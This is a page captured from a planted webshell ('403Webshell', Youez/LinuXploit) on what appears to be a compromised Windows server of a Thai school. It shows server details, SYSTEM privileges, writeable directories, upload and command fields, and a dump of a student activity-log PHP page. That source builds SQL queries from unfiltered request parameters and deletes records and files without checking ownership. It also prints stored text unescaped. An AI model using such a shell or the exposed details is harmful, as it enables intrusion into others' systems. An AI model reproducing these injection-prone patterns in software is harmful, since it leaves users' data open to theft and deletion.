403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/triamudom/check/knowledge/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/myschool/triamudom/check/knowledge//display_regis_logwork.php
<?php
session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
$CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 

$tb_register_knowledge_id = $_REQUEST['tb_register_knowledge_id'];
$tb_student_id = $_REQUEST['tb_student_id'];
$tb_knowledge_log_id = $_REQUEST['tb_knowledge_log_id'];
$process = $_REQUEST['process'];

if($process=="del"){
	$q=$db->query("select  tb_knowledge_log_picture from tb_knowledge_logs where tb_knowledge_log_id='".$tb_knowledge_log_id."'");
	$rec=$db->fetch_array($q);
	
	if($rec['tb_knowledge_log_picture']){
		unlink("file_work/".$rec['tb_knowledge_log_picture']);
	}

	$db->query("delete from tb_knowledge_logs where tb_knowledge_log_id='".$tb_knowledge_log_id."' ");
	
	print "
	<script language='javascript'>
	   alert('ลบข้อมูลเรียบร้อยแล้ว');
		window.location.href='".$_SERVER['PHP_SELF']."';
	</script>
	";
}
//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//
$fetch_public = $db->fetch_array($db->query("select * from tb_public"));
//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//


//--------------------ส่วนบนใช้สำหรับประกาศตัวแปรและ Config เท่านั้น----------------------------//
?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title><?php print $fetch_public['tb_public_title'];?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="css/style.css"rel="stylesheet" type="text/css">
<script type="text/javascript"  src="../js/format.js" ></script>
<script type="text/javascript"  src="../js/dtree.js"  ></script>
<link href="../css/style.css" rel="stylesheet" type="text/css">
<script language="JavaScript"  type="text/javascript"  src="../js/editor.js"></script>
<script type="text/javascript" src="../ckeditor/ckeditor.js"></script>
<script src="js/jqueryui_datepicker_thai.js"></script>  
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>  
<script src="js/jqueryui_datepicker_thai.js"></script>  
<script type="text/javascript">  
$(function(){  
    $("#dateInput").datepicker({  
        dateFormat: 'dd-mm-yy',  
        showOn: 'button',  
        numberOfMonths: 2,  
//      buttonImage: 'http://jqueryui.com/demos/datepicker/images/calendar.gif',  
        buttonImageOnly: false,  
        changeMonth: true,  
        changeYear: true  
    });  
      
    $("#dateInput2").datepicker({  
        dateFormat: 'dd-mm-yy',  
        showOn: 'button',  
        numberOfMonths: 2,  
//      buttonImage: 'http://jqueryui.com/demos/datepicker/images/calendar.gif',  
        buttonImageOnly: false,  
        changeMonth: true,  
        changeYear: true  
    });   
      
    $("#dateInput3").datepicker({  
        dateFormat: 'dd-mm-yy',  
        showOn: 'button',  
//      buttonImage: 'http://jqueryui.com/demos/datepicker/images/calendar.gif',  
        buttonImageOnly: false,  
        changeMonth: true,  
        changeYear: true  
    });       
      
    $("#date_inline").datepicker({  
        dateFormat: 'dd-mm-yy',  
        buttonImageOnly: false  
    });  
      
    $("#date_inline2").datepicker({  
        dateFormat: 'dd-mm-yy',  
        buttonImageOnly: false  
    });   
      
});  
</script>
<?php    
$jquery_ui_v="1.8.5";    
$theme=array(    
    "0"=>"base",    
    "1"=>"black-tie",    
    "2"=>"blitzer",    
    "3"=>"cupertino",    
    "4"=>"dark-hive",    
    "5"=>"dot-luv",    
    "6"=>"eggplant",    
    "7"=>"excite-bike",    
    "8"=>"flick",    
    "9"=>"hot-sneaks",    
    "10"=>"humanity",    
    "11"=>"le-frog",    
    "12"=>"mint-choc",    
    "13"=>"overcast",    
    "14"=>"pepper-grinder",    
    "15"=>"redmond",    
    "16"=>"smoothness",    
    "17"=>"south-street",    
    "18"=>"start",    
    "19"=>"sunny",    
    "20"=>"swanky-purse",    
    "21"=>"trontastic",    
    "22"=>"ui-darkness",    
    "23"=>"ui-lightness",    
    "24"=>"vader"    
);    
$jquery_ui_theme=$theme[22];    
?>    
<link type="text/css" rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/<?=$jquery_ui_v?>/themes/<?=$jquery_ui_theme?>/jquery-ui.css" />    
<style type="text/css">    
/* ปรับขนาดตัวอักษรของข้อความใน tabs   
สามารถปรับเปลี่ยน รายละเอียดอื่นๆ เพิ่มเติมเกี่ยวกับ tabs  
*/    
.ui-tabs{    
    font-family:tahoma;    
    font-size:11px;    
}    
</style>    
<style type="text/css">  
/* Overide css code กำหนดความกว้างของปฏิทินและอื่นๆ */  
.ui-datepicker{  
    width:220px;  
    font-family:tahoma;  
    font-size:11px;  
    text-align:center;  
}  
</style> 
<style type="text/css">
<!--
.style1 {
	color: #006600;
	font-weight: bold;
}
.style2 {font-size: 14px}
-->
</style>

</head>
<script language="javascript">
	function chknull(c){
		if(c.tb_knowledge_log_date.value==''){
			alert('กรุณาเลือก วันที่ทำกิจกรรม');
			c.tb_knowledge_log_date.focus();
			return false;
		}
	}
</script>
<body>
<table width="988" height="100%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
  <tr>
    <td height="200" align="center" valign="top"><?php include('header.php');?></td>
  </tr>
  <tr>
    <td valign="top"><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="209" height="50%" align="center" valign="top"><?php include('com_left.php');?></td>
        <td valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td width="9" height="39"><img src="images/la21/bcontent_03.jpg" width="9" height="39" /></td>
            <td height="39" background="images/la21/bcontent_06.jpg"><img src="images/bar_act.jpg" width="411" height="39" border="0"></td>
            <td width="13" height="39"><img src="images/la21/bcontent_08.jpg" width="13" height="39" /></td>
          </tr>
          <tr>
            <td height="15" background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td align="center"></td>
            <td height="15" background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td><strong>ข้อมูลบันทึกกิจกรรม</strong></td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td>&nbsp;</td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td><table width="98%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#FF9900">
              <tr>
                <td width="17%" height="25" align="center" nowrap class="headTable_mpt"><span class="biggray style2">วันเดือนปี</span></td>
                <td width="67%" nowrap class="headTable_mpt"><span class="biggray style2">รายละเอียดการเรียนรู้</span></td>
                <td width="10%" align="center" nowrap class="headTable_mpt"><span class="biggray style2">ภาพกิจกรรม</span></td>
                <td width="6%" align="center" nowrap class="headTable_mpt style2">ลบ</td>
              </tr>
			  <?php 
				$sql_all_log="select * from tb_knowledge_logs  where tb_student_id ='".$_SESSION['sessionuser_id']."' order by tb_knowledge_log_date asc,tb_knowledge_log_id asc ";
				$query_dis_log = $db->query($sql_all_log);
				$queryall_log = $db->query($sql_all_log);
				$numrows_log = $db->num_rows($queryall_log);
				if($numrows_log >0){
					$i=1;
					while($fetch_dis_log = $db->fetch_array($query_dis_log)){
			  ?>
              <tr>
                <td align="center" valign="top" bgcolor="#FFFFFF"><?php print display_datethai($fetch_dis_log['tb_knowledge_log_date'],'longthai');?></td>
                <td bgcolor="#FFFFFF"><?php print $fetch_dis_log['tb_knowledge_log_detail'];?></td>
                <td align="center" valign="top" bgcolor="#FFFFFF"><a href="file_work/<?php print $fetch_dis_log['tb_knowledge_log_picture'];?>" target="_blank"><img src="images/icons/tree.gif" width="18" height="17" border="0"></a></td>
                <td align="center" valign="top" bgcolor="#FFFFFF"><a href="display_regis_logwork.php?tb_knowledge_log_id=<?php print $fetch_dis_log['tb_knowledge_log_id'];?>&&process=del"><img src="images/icons/b_drop.png" alt="ลบ ข้อ มูล" width="16" height="16" border="0" align="absmiddle"></a></td>
              </tr>
                              <?php
											$i++;
											}
											}else{
										?>
              <tr>
                <td colspan="4" align="center" bgcolor="#FFFFFF" class="alertred">ไม่พบข้อมูล</td>
                </tr>
                                 <?php 
												}
										  ?>
         </table></td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td>&nbsp;</td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td>&nbsp;</td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td><table width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
              <tr>
                <td><fieldset style="border-color:#FF9900">
                <legend class="style1"><img src="images/icons/pencil_icon.gif" width="10" height="10" align="absmiddle"> บันทึกการเรียนรู้</legend>
                <form action="function_save_logwork.php" method="post" enctype="multipart/form-data"name="save_know" onSubmit="return chknull(this);">
                  <input name="tb_register_knowledge_id" type="hidden" value="<?php print $tb_register_knowledge_id;?>">
                  <table width="100%" border="0" cellpadding="3" cellspacing="3">
                    <tr>
                      <td width="21%" align="right" valign="top" nowrap bgcolor="#FFFFFF" class="biggray">วันเดือนปี : </td>
                      <td width="79%" bgcolor="#FFFFFF"><input name="tb_knowledge_log_date" type="text" class="textbox" id="dateInput3" readonly>
                      </td>
                    </tr>
                    <tr>
                      <td align="right" valign="top" nowrap bgcolor="#FFFFFF" class="biggray">รายละเอียดการเรียนรู้ : </td>
                      <td bgcolor="#FFFFFF"><textarea name="tb_knowledge_log_detail" class="textbox" id="tb_knowledge_log_detail" required></textarea></td>
                    </tr>
                    <tr>
                      <td align="right" valign="top" nowrap bgcolor="#FFFFFF" class="biggray">ภาพกิจกรรม : </td>
                      <td bgcolor="#FFFFFF"><input name="tb_knowledge_log_picture" type="file" class="textbox" id="tb_knowledge_log_picture" required></td>
                    </tr>
                    <tr>
                      <td nowrap bgcolor="#FFFFFF" class="biggray">&nbsp;</td>
                      <td bgcolor="#FFFFFF"><input type="submit" name="Submit" value="บันทึก">
                          <input type="reset" name="Submit2" value="กลับ"></td>
                    </tr>
                  </table>
                </form>
                </fieldset></td>
              </tr>
            </table></td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td>&nbsp;</td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td>&nbsp;</td>
            <td background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td height="15" background="images/la21/bcontent_13.jpg">&nbsp;</td>
            <td align="center"></td>
            <td height="15" background="images/la21/bcontent_15.jpg">&nbsp;</td>
          </tr>
          <tr>
            <td width="9" height="15"><img src="images/la21/bcontent_18.jpg" width="9" height="15" /></td>
            <td height="15" background="images/la21/bcontent_19.jpg"></td>
            <td width="13" height="15"><img src="images/la21/bcontent_20.jpg" width="13" height="15" /></td>
          </tr>
        </table></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="37" valign="bottom"><?php include('footer.php');?></td>
  </tr>
</table>
</body>
</html>
<script type="text/javascript">
            CKEDITOR.replace( 'tb_knowledge_log_detail',{
					enterMode : CKEDITOR.ENTER_BR,
		            } );
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit